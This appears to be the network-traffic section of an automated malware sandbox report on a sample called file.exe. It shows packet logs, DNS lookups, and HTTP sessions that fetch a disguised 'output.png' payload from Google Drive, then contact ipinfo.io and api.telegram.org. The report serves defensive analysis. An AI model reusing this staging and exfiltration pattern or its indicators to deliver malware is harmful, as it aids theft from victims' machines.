                                                                                                                                                                        Dec 12, 2024 16:53:52.609472036 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.609538078 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.610605955 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.610657930 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.615803003 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.615890980 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.616822958 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.616883039 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.621947050 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.622014999 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.623486996 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.623548985 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.633757114 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.633824110 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.634793997 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.634857893 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.635551929 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.635612965 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.638020992 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.638077021 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.639475107 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.639548063 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.641354084 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.641407013 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.644867897 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.644934893 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.645908117 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.645958900 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.650100946 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.650167942 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.651438951 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.651493073 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.654993057 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.655102968 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.655109882 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.655159950 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.660455942 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.660506010 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.660520077 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.660562992 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.665561914 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.665611982 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.665627956 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.665673018 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.670542002 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.670655012 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.670945883 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.671001911 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.676515102 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.676575899 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.677419901 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.677473068 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.680466890 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.680515051 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.680526018 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.680566072 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.685307026 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.685374022 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.685389042 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.685437918 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.690730095 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.690777063 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.690787077 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.690833092 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.695323944 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.695415974 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.695426941 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.695471048 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.700041056 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.700145960 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.700748920 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.700802088 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.705101013 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.705179930 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.705189943 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.705260992 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.710191965 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.710289955 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.710299969 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.710338116 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.710462093 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.710494995 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.710628033 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:52.849251986 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:52.849308968 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.849368095 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:52.849739075 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:52.849756956 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.865801096 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:52.865843058 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.865936041 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:52.866193056 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:52.866206884 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.083022118 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.083185911 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:54.087306023 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:54.087323904 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.088009119 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.088095903 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:54.088510036 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:54.131339073 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.429742098 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.429828882 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.433278084 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.433291912 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.433559895 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.433634996 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.433955908 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.475346088 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.647924900 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.648111105 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.648402929 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:54.649204969 CET49747443192.168.2.934.117.59.81
                                                                                                                                                                        Dec 12, 2024 16:53:54.649228096 CET4434974734.117.59.81192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.686657906 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.686702013 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.686927080 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.687153101 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.687172890 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.990364075 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.990431070 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:54.990437984 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:54.990489006 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:55.033901930 CET49746443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:55.033925056 CET44349746149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.051106930 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.051193953 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.070709944 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.070739985 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.071209908 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.071270943 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.072076082 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.119328022 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.607222080 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.607292891 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:56.607355118 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.607355118 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.608234882 CET49749443192.168.2.9149.154.167.220
                                                                                                                                                                        Dec 12, 2024 16:53:56.608253956 CET44349749149.154.167.220192.168.2.9
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 12, 2024 16:53:42.237551928 CET6347153192.168.2.91.1.1.1
                                                                                                                                                                        Dec 12, 2024 16:53:42.374806881 CET53634711.1.1.1192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.127674103 CET5906853192.168.2.91.1.1.1
                                                                                                                                                                        Dec 12, 2024 16:53:45.265346050 CET53590681.1.1.1192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.515853882 CET5041153192.168.2.91.1.1.1
                                                                                                                                                                        Dec 12, 2024 16:53:50.653062105 CET53504111.1.1.1192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:52.696373940 CET5706953192.168.2.91.1.1.1
                                                                                                                                                                        Dec 12, 2024 16:53:52.835109949 CET53570691.1.1.1192.168.2.9
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 12, 2024 16:53:42.237551928 CET192.168.2.91.1.1.10xed1dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:45.127674103 CET192.168.2.91.1.1.10x9b42Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:50.515853882 CET192.168.2.91.1.1.10xfe43Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:52.696373940 CET192.168.2.91.1.1.10x61dbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 12, 2024 16:53:36.392852068 CET1.1.1.1192.168.2.90x80e3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:36.392852068 CET1.1.1.1192.168.2.90x80e3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:42.374806881 CET1.1.1.1192.168.2.90xed1dNo error (0)drive.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:45.265346050 CET1.1.1.1192.168.2.90x9b42No error (0)drive.usercontent.google.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:50.653062105 CET1.1.1.1192.168.2.90xfe43No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 12, 2024 16:53:52.835109949 CET1.1.1.1192.168.2.90x61dbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                        • drive.google.com
                                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                                        • ipinfo.io
                                                                                                                                                                        • api.telegram.org
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.949717172.217.17.464437456C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:44 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2024-12-12 15:53:45 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:53:44 GMT
                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FXWw7_WPey9CdAD0Z_hY6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                        Server: ESF
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.949718172.217.17.464437540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:44 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2024-12-12 15:53:45 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:53:44 GMT
                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-HEotRJgmMpxHtIKzMFlFhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                        Server: ESF
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.949724142.250.181.654437456C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:47 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-12-12 15:53:49 UTC4915INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 156917
                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                        X-GUploader-UploadID: AFiumC7qmFgHJ8DOjLNVFCZw_tCBklXEk6Yh9QAhyWMm8GITWZexwX5CBjWsD0aY31HxuA1Me1w
                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:53:49 GMT
                                                                                                                                                                        Expires: Thu, 12 Dec 2024 15:53:49 GMT
                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                        X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close
                                                                                                                                                                        2024-12-12 15:53:49 UTC4915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                        Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                        2024-12-12 15:53:49 UTC4873INData Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2
                                                                                                                                                                        Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                        2024-12-12 15:53:49 UTC1317INData Raw: 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 f7 8e 79 1f 2e
